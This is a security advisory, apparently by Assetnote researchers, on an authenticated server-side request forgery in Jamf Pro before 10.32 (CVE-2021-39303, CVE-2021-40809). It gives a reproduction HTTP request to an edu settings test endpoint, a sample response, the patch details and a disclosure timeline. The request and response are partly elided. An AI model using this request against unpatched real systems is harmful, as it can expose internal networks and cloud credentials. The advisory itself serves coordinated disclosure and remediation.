Research Notes
November 30, 2021

Advisory: Jamf Pro SSRF - CVE-2021-39303 & CVE-2021-40809

No items found.
Creative Commons license


Jamf Pro before version 10.32 is vulnerable to a server-side request forgery vulnerability, that allows attackers to request arbitrary URLs and read the full HTTP response for these requests. This vulnerability is only exploitable after an attacker has authenticated to the Jamf Pro instance. On cloud environments such as AWS, this poses a greater risk as an attacker can potentially obtain AWS credentials via the metadata IP address.


An attacker can request arbitrary URLs on behalf of the Jamf Pro server. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials. As Jamf Pro is often deployed on-premise within an internal network, this vulnerability exposes this internal network to authenticated Jamf Pro users.

Affected Software

Jamf Pro before version 10.32.

Product Description

Jamf Pro is an application used by system administrators to configure and automate IT administration tasks for macOS, iOS, iPadOS, and tvOS devices. Jamf offers on-premises and cloud-based mobile device management.


This vulnerability was patched in Jamf 10.32.

Please find the detail about this Jamf release here:

In order to remediate this vulnerability, we recommend upgrading to the latest version of Jamf Pro on premise.


<span class="code_single-line">http://yourjamfinstance:8090/eduFeatureSettingsTest.html</span>

The following HTTP request can be made to reproduce this issue, once authenticated to Jamf:

POST /eduFeatureSettingsTest.ajax?id=0&o=r HTTP/1.1
Host: jamfpro:8080
Content-Length: 117
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://re.local:8090
Referer: http://re.local:8090/legacy/eduFeatureSettingsTest.html?id=0&o=r
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

The full HTTP response for the requested URL can be found in the base64Image XML tag, from the response of the Jamf Server:

HTTP/1.1 200 
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
sessionExpiresEpoch: 1800
Date: Tue, 17 Aug 2021 13:09:14 GMT
Connection: close
Content-Length: 1959

<?xml version="1.0" encoding="UTF-8"?><jss>
<ERROR_TEXT>The distribution point URL should begin with "https://"</ERROR_TEXT>

Upon decoding the Base64, the full contents of the request to is returned:

<!doctype html>
    <title>Example Domain</title>
... ommitted for brevity ...

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.


Assetnote Security Research Team


  • 18/08/2021 - Reported to Jamf
  • 19/08/2021 - Initial response from Jamf
  • 24/08/2021 - CVE claimed by Jamf
  • 07/09/2021 - Jamf 10.32 released with patches for this issue
  • 01/12/2021 - Blog post published on Assetnote blog
Written by:
Shubham Shah
Your subscription could not be saved. Please try again.
Your subscription has been successful.

Get updates on our research

Subscribe to our newsletter and stay updated on the newest research, security advisories, and more!

Ready to get started?

Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.